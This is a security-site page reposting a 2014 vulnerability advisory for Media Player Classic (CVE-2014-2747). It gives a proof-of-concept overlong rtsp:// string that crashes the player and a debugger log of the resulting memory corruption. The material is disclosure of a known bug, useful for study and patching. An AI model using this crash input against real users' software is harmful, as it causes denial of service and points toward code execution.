首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Media Player Classic 1.3.1752.0 / 1.3.1249.0 Memory Corruption
来源:https://www.linkedin.com/profile/view?id=276969082 作者:Aryan 发布时间:2014-04-22  
# Exploit Title: [Media Player Classic Memory Corruption]
# Date: [2014/04/13]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://mpc-hc.org/]
# Software Link: [
http://sourceforge.net/projects/mpc-hc/files/MPC%20HomeCinema%20-%20Win32/MPC-HC%20v1.3.1249.0_32%20bits/
]
# Version: [Version 1.3.1752.0 and 1.3.1249.0]
# Tested on: [Windows Xp Sp 3 Version 2002]
# CVE : [CVE-2014-2747]

details:


The root cause of the vulnerability is related to handling the rtsp
protocol in open file, when opening a file in media player classic, it's
not able to parse the rtsp protocol with long strings correctly & caused a
memory corruption vulnerability, this is due to the wrong parsing of rtsp
protocol in OpenFile menu .

rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Log data, item 0
 Address=FEEEFEEE
 Message=Access violation when executing [FEEEFEEE]


EAX 01EA5730
ECX 02E21840
EDX FEEEFEEE
EBX 00000000
ESP 0012F6CC
EBP FFFFFFFF
ESI 012124E0
EDI 00000000
EIP FEEEFEEE
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty -2.8591239712727915520e+4908
ST1 empty -UNORM F700 0000002C 84F12DA8
ST2 empty 0.0194887299572376640e-4933
ST3 empty 1.5530773741217080320e-4124
ST4 empty +UNORM 6E64 00000000 B9EFA280
ST5 empty 1.0000000000000000000
ST6 empty 8000000.0000000000000
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 007F  Prec NEAR,24  Mask    1 1 1 1 1 1




0012D58A   00410041  mpc-hc.00410041
0012D58E   00410041  mpc-hc.00410041
0012D592   00410041  mpc-hc.00410041
0012D596   00410041  mpc-hc.00410041
0012D59A   00410041  mpc-hc.00410041
0012D59E   00410041  mpc-hc.00410041
0012D5A2   00410041  mpc-hc.00410041
0012D5A6   00410041  mpc-hc.00410041
0012D5AA   00410041  mpc-hc.00410041
0012D5AE   00410041  mpc-hc.00410041
0012D5B2   00410041  mpc-hc.00410041
0012D5B6   00410041  mpc-hc.00410041
0012D5BA   00410041  mpc-hc.00410041
0012D5BE   00410041  mpc-hc.00410041
0012D5C2   00410041  mpc-hc.00410041
0012D5C6   00410041  mpc-hc.00410041
0012D5CA   00410041  mpc-hc.00410041
0012D5CE   00410041  mpc-hc.00410041
0012D5D2   00410041  mpc-hc.00410041
0012D5D6   00410041  mpc-hc.00410041
0012D5DA   00410041  mpc-hc.00410041
0012D5DE   00410041  mpc-hc.00410041
0012D5E2   00410041  mpc-hc.00410041
0012D5E6   00410041  mpc-hc.00410041
0012D5EA   00410041  mpc-hc.00410041
0012D5EE   00410041  mpc-hc.00410041
0012D5F2   00410041  mpc-hc.00410041
0012D5F6   00410041  mpc-hc.00410041
0012D5FA   00410041  mpc-hc.00410041

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ATSEngine credential disclosur
·No-CMS 0.6.6 rev 1 - Admin Acc
·Adobe Flash Player Regular Exp
·Bonefire v.0.7.1 - Reinstall A
·Linux group_info refcounter -
·Acunetix 8 build 20120704 - Re
·Sercomm TCP/32674 Backdoor Rea
·Acunetix 8 Scanner Buffer Over
·Nagios Remote Plugin Executor
·mRemote Offline Password Decry
·Ruby OpenSSL Private Key Spoof
·JRuby Sandbox 0.2.2 Bypass
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved